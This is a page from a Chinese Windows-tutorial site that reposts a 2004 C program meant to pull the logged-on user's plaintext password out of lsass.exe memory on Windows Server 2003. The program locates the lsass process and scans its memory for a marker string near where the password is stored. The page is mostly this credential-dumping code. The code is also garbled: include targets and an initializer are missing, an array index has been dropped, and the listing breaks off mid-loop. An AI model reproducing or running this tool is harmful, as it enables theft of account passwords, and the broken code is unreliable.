系统城装机大师 - 固镇县祥瑞电脑科技销售部宣传站!

当前位置:首页 > 系统教程 > Win2003教程 > 详细页面

在win 2003中得到登陆用户的密码的三大妙法(2)

时间:2017-08-17来源:系统城装机大师作者:木木

  代码: //********************************************************************************

  // Version: V1.0

  // Coder: WinEggDrop

  // Date Release: 12/15/2004

  // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method

  // Used Is Pretty Unwise,But This May Be The Only Way To Review The

  // Logon User's Password On windows 2003.

  // Test PlatForm: windows 2003

  // Compiled On: VC++ 6.0

  //********************************************************************************

  #include

  #include

  #include

  #define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

  char Password[MAX_PATH] = ; // Store The Found Password

  // Function ProtoType Declaration

  //------------------------------------------------------------------------------------------------------

  BOOL FindPassword(DWORD PID);

  int Search(char *Buffer,const UINT nSize);

  DWORD GetLsassPID();

  BOOL Is2003();

  //------------------------------------------------------------------------------------------------------

  // End Of Fucntion ProtoType Declaration

  int main()

  {

  DWORD PID = 0;

  printf("windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

  if (!Is2003()) // Check Out If The Box Is 2003

  {

  printf("The Program Can't Only Run On windows 2003 Platform\n");

  return -1;

  }

  PID = GetLsassPID(); // Get The Lsass.exe PID

  if (PID == 0) // Fail To Get PID If Returning Zerom

  {

  return -1;

  }

  FindPassword(PID); // Find The Password From Lsass.exe Memory

  return 0;

  }

  // End main()

  //------------------------------------------------------------------------------------

  // Purpose: Search The Memory & Try To Get The Password

  // Return Type: int

  // Parameters:

  // In: char *Buffer --> The Memory Buffer To Search

  // Out: const UINT nSize --> The Size Of The Memory Buffer

  // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",

  // Since The Password Is Near The Above Location,But It's Not Always True That

  // We Will Find The Magic String,Or Even We Find It,The Password May Be Located

  // At Some Other Place.We Only Look For Luck

  //------------------------------------------------------------------------------------

  int Search(char *Buffer,const UINT nSize)

  {

  UINT OffSet = 0;

  UINT i = 0;

  UINT j = 0 ;

  UINT Count = 0;

  if (Buffer == NULL)

  {

  return -1;

  }

  for (i = 0 ; i < nSize ; i++)

  {

  /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word

  Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate

  The Magic String,We Have To Do It Manually And Slowly

  */

  if (Buffer == 'L')

  {

  OffSet = 0;

  if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)

  {

  OffSet += strlen("LocalSystem") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)

  {

  OffSet += strlen("Remote") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)

  {

  OffSet += strlen("Procedure") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)

  {

  i += OffSet;

  break;

  }

  }

  }

  }

  }

  }

  if (i < nSize)

  {

  ZeroMemory(Password,sizeof(Password));

  for (; i < nSize ; i++)

分享到:

相关信息

  • Win2003不能播放FLV文件的解决方法

    由于win2003系统上并没有.FLV的mime-type类型,win2003不是默认支持FLV文件的,所以在win2003系统下遇到无法播放FLV文件是非常正常的情况,如果需要在win2003系统中播放FLV文件的话,用户可以自己动手来设置。...

    2017-08-17

  • 打造win2003个性屏保的秘笈

    在windows me和xp系统的屏幕保护程序中有一个全新的创意设置,可以将“我的文档”里收藏的图片做成屏保,在其他的windows操作系统中就没有这个功能了,用户要想在win2003系统中也移植进入这个功能,可以按照下面的五个步骤...

    2017-08-17

系统教程栏目

栏目热门教程

人气教程排行

站长推荐

热门系统下载